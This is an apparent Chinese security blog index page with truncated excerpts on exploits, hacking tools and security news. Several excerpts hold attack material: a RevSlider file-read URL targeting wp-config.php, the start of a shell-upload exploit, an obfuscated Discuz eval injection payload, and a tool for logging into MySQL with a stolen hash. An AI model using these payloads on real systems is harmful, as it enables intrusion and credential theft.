免密码hash登陆mysql

   
分类:工具 | 2016-06-28 | 撸过 6,361 次
1人扯蛋

在获取到mysql用户的hash后,
可用hash直接登陆mysql进行操作
比如我们注入出数据库的hash,但是没办法拿到webshell
我们可以使用mysql_hash,用hash登陆并控制数据库
使用方法:

mysql_hash.exe -u root -p < 1.txt

Enter password: *****************************************
其中1.txt在同目录,内容为你想执行的sql语句,
比如:show databases;

[......]

继续阅读

Thinkphp 漏洞小结

   
分类:安全 | 2016-06-14 | 撸过 12,031 次
5人扯蛋

首先确定这个网站使用thinkphp的框架

国内很多php开源项目的代码都是使用thinkphp框架编写的,但是thinkphp框架有很多版本,如何才能知道我们使用的框架是哪个版本的呢?

在URL后面加thinkphp的目录,也有可能爆出来

这是一个tankphp的网站目录。供参考

  • admin是后台工程文件夹
  • home是前台工程
  • public里面用于存放CSS文件,JS文件以及网页里面的图片
  • ThinkPHP框架
  • ueditor是百度编辑器

ThinkPHP的Ubb标签漏洞读取任意内容

http://w[......]

继续阅读

御剑web指纹识别

   
分类:工具 | 2015-08-24 | 撸过 2,831 次
0人扯蛋

御剑web指纹识别程序是一款CMS指纹识别小工具,该程序由.NET 2.0框架开发,配置灵活、支持自定义关键字和正则匹配两种模式、使用起来简洁、体验良好。在指纹命中方面表现不错、识别速度很快、但目前比较明显的缺陷是指纹的配置库偏少。

[......]

继续阅读

Kali2.0 正式发布

   
分类:安全 | 2015-08-23 | 撸过 1,054 次
0人扯蛋

Kali 2.0昨天已经在BlackHat 2015 USA上正式发布了。无论是粉丝们还是Kali官方都对这个2.0版本抱有极大的期待和热情。这是第一个基于Debian Jessie的Kali版本,此次升级最大的特点就是系统界面的设计理念更加先进,以及系统的升级方式变为滚动升级。

官方的Kali2.0介绍

1.将会保持滚动升级。
这是Kali 2.0最重要的更新,滚动升级的方式将会保证Debian的稳定性,同时保证Kali自身是个强有力的工具。
2.不断更新工具,工作流程将会极大增强。
3.Kali2.0的新史诗级皮肤
Kali2.0现在原生支持KDE, GNOME3, Xfce, MAT[......]

继续阅读

Google 镜像站

   
分类:安全 | 2015-07-20 | 撸过 1,738 次
2人扯蛋

转载自itechzero

2015.7.19 更新。新增谷歌学术列表!

原版:

https://guge.io/
https://goge.ml/
https://g.zyz.me/
https://g.wen.lu/
https://gg.avpn.cc/
https://cc.rrke.cc/
https://www.ko50.com/
https://g4w.me/
https://s.bt.gg/
https://hk.g.net.co/
https://www.booo.so/
https://duliziyou.com/
https://laoshandaoshi.so[......]

继续阅读

PHP任意文件上传漏洞

   
分类:安全 | 2015-04-18 | 撸过 2,595 次
2人扯蛋

漏洞细节:

这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。

例子:

move_uploaded_file ( string $filename , string $destination )
这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。

我这里用D[......]

继续阅读

WordPress幻灯片插件RevSlider漏洞利用

   
分类:安全 | 2015-04-18 | 撸过 2,649 次
0人扯蛋

任意读取:

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 

任意上传

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Upda[......]

继续阅读

IIS最新高危漏洞POC及在线检测源码-CVE-2015-1635-MS15-034

   
分类:安全 | 2015-04-18 | 撸过 2,808 次
0人扯蛋

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS15-034

 


[......]

继续阅读

全球黑客势力分布实时监控之数据可视化

   
分类:技术 | 2015-02-10 | 撸过 3,248 次
0人扯蛋

也许互联网比我们想象的更加不安全,当今世界几乎无时不刻在发生着大大小小的黑客攻击事件。Norse是一家互联网安全服务商,如本文导图所示,它通过数据可视化的方式将全球各地黑客攻击行为动态地显示在地图上,直观的显示全球网络攻击行为的发起地点和目标地点。
此外它还提供相关数据的统计,比如攻击发起数量的国家排行,受攻击数量国家排行,以及攻击类型的排行,可以看到数据显示发起地前三位分别是:中国,美国和香港,受攻击排行分别是:美国,香港和台湾,而攻击方式的前三位为:ssh攻击,domain域名攻击, 微软数据库漏洞攻击(ms-sql-s),完整统计如下图所示(此数据因时间而异)。
[......]

继续阅读

Discuz!X系列转换工具任意代码写入漏洞 getshell

   
分类:安全 | 2015-02-10 | 撸过 5,111 次
1人扯蛋

有些论坛 可能路径放在其它目录 没有utility 直接convert等

如果看到 转换程序的 data/ 目录不可写 就不用试了 不成功

http://webshell.cc/utility/convert/index.php?a=config&source=d7.2_x2.0

post提交:

a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897[......]

继续阅读